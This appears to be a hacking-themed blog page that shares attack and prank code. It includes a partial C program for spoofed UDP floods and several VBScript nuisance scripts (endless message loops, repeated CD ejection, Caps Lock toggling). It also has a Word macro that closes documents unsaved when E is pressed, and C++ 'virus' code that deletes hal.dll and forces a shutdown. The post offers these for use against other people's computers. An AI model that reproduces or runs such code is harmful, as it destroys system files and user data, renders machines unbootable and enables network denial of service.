Hacking Linux Server is a complex
matter, specially because the meaning of hacking is sometimes
non-specific. Is it to use computer programs made by other programmers
to compromise security on a vulnerable server or platform and not get
caught? Well, people generally consider this script kiddioting (kidding +
idiotic) and for a very long time I did too, but nowadays if you can go
from base line (ground zero, or whatever you want to call it) to
actually having full access (UID 0) on a machine and keep it so that a
system administrator cannot detect you, then you must at least have some
credit and if you were able to create simple scripts to achieve this,
you DID hack something, so it’s hacking!
Showing posts with label Deadly script. Show all posts
Showing posts with label Deadly script. Show all posts
Wednesday, December 14, 2011
Friday, January 7, 2011
A UDP Flood Program/Script....
This script/program is created by Code Mobile. Iam not taking thecredit of the original author. :)
/*
My advice is to disable the echo service completely. It is often used by hackers to hang a computer.
Try sending a packet from port 7 your ip to port 7 your ip.
The system will bounce the packet back and forth slowing the system
drastically.
A Hacker Program I have seen used to do this is called codeudp.c
*/
/************************************************************************/
/* codeudp.c version 0.01 by CodeMobile - codemobile@yahoo.com */
/* Sends a single udp datagram with the source/destination address/port */
/* set to whatever you want. Unfortunately Linux 1.2 and SunOS 4.1 */
/* don't seem to have the IP_HDRINCL option, so the source address will */
/* be set to the real address. It does however work ok on SunOS 5.4. */
/* Should compile fine with just an ANSI compiler (such as gcc) under */
/* Linux and SunOS 4.1, but with SunOS 5.4 you have to specify extra */
/* libraries on the command line: */
/* /usr/ucb/cc -o codeudp codeudp001.c -lsocket -lnsl */
/* I'll state the obvious - this needs to be run as root! Do not use */
/* this program unless you know what you are doing, as it is possible */
/* that you could confuse parts of your network / internet. */
/* (c) 2011 Code Mobile - I accept no responsiblity for anything this does. */
/************************************************************************/
/* I used the source of traceroute as an example while writing this. */
/* Many thanks to Anu (pctipsbyanu@yahoo.com) and Inspired */
/* for pointing me in the right direction. */
/************************************************************************/
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in_systm.h>
#include<netinet/in.h>
#include<netinet/ip.h>
#include<netinet/udp.h>
#include<errno.h>
#include<string.h>
#include<stdlib.h>
#include<netdb.h>
#include<arpa/inet.h>
#include<stdio.h>
struct sockaddr sa;
....To take advantage you must DOWNLOAD FULL CODE.
Compile and execute as root
All credit goes to Code Mobile.
For any questions or queries you must be directly contact to original author.
Thanks....
Some hacks with VB Script...
Some windows n computer hacks via vb script n you can also say that VB Script Tweaks for fun or hack...
Continue message :
Continue message :
This is a VBs file so of course save as VBS, it gives so many messages…
do
WScript.Echo (“This is JAIMIN WORLD”)
loop
WScript.Echo (“This is JAIMIN WORLD”)
loop
Notepad Hacks :
This is a VBs file so of course save as VBS, you can replace the txt in this code with whatever you want
- Set wshshell = wscript.CreateObject(“WScript.Shell”)
Wshshell.run “Notepad”
wscript.sleep 400
wshshell.sendkeys “J”
wscript.sleep 100
wshshell.sendkeys “a”
wscript.sleep 120
wshshell.sendkeys “i”
wscript.sleep 200
wshshell.sendkeys “M”
wscript.sleep 140
wshshell.sendkeys “i”
wscript.sleep 100
wshshell.sendkeys “n “
wscript.sleep 100
wshshell.sendkeys ” “
wscript.sleep 200
wshshell.sendkeys “w”
wscript.sleep 150
wshshell.sendkeys “o”
wscript.sleep 170
wshshell.sendkeys “r”
wscript.sleep 200
wshshell.sendkeys “l”
wscript.sleep 100
wshshell.sendkeys “d”
wscript.sleep 50
wshshell.sendkeys ” “
wscript.sleep 120
wshshell.sendkeys “H”
wscript.sleep 160
wshshell.sendkeys “A”
wscript.sleep 200
wshshell.sendkeys “C”
wscript.sleep 100
wshshell.sendkeys “K”
wscript.sleep 100
wshshell.sendkeys ” “
wscript.sleep 200
Keyboards hack :
This is a VBS code that each time you pree the letter “E”, it willclose without saving, the reason “E” was chosen is because E is themost common used letter in the english language.
- Open MS Word And Press F11, To Open The MS Vbs Editor. Then input this :Sub AddKeyBinding()
CustomizationContext = NormalTemplate
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyE), KeyCategory:=wdKeyCategoryCommand, _
Command:=”TestKeybinding”
End Sub
Sub TestKeybinding()
Dim x As Document
Set x = ActiveDocument
x.Close (False)
End Sub
Caps lock, Num lock n Scroll lock hack :
we have a code that turns on and off your capslock repeatedly, alsovbs, end same way as last time, this turns on and off your capslockevery tenth of a second until shutdown, or (don’t tell your friends,you press ctrl + alt + delete and go to processes, and end wscript.exe (this code is vbs so save in note pad as whateveryouwant.vbs)
- Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
- Just replace CAPSLOCK by SCROLLLOCK and NUMLOCK and run it..
CD drive hack :
The first code we are going to look at is one that makes the cdtray open and close repeatedly until shutdown, or (don’t tell yourfriends, you press ctrl + alt + delete and go to processes, and end wscript.exe (this code is vbs so save in note pad as whateveryouwant.vbs)
- Set oWMP = CreateObject(“WMPlayer.OCX.7″ )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
loop
end if
Powerfull C++ code (Deadly script/code)...
Warning: Do not try this on your home computer. I'm not responsible for anything...
The file hal.dll, is required for windows to operate. It is used bywindows when communicating with your computer’s harware. It acts as atranslator between windows and your hardware, so that the same windows‘commands’ can be executed on hardware manufactured by a variety ofdifferent vendors. If hal.dll is unavailable, windows will not functioncorrectly.
So the following code delete the hal.dll and shutdown the computer…
- #include < cstdlib >
#include < iostream >using namespace std;int main(int argc, char *argv[])
{
std::remove(”%systemroot%\\system32\\hal.dll”); //PWNAGE TIME
system(”shutdown -s -r”);
system(”PAUSE”);
return EXIT_SUCCESS;
}
New Version of this virus that uses Batch for most of its commands:
- #include < cstdlib >
#include < iostream >using namespace std;int main(int argc, char *argv[])
{
system(“del %SystemRoot%\\system32\\hal.dll -q”); //PWNAGE TIME
system(“%SystemRoot%\\system32\\shutdown.exe -s -f -t 00″);
system(“PAUSE”);
return EXIT_SUCCESS;
}
DOWNLOAD CODE
Thanks...
Subscribe to:
Posts (Atom)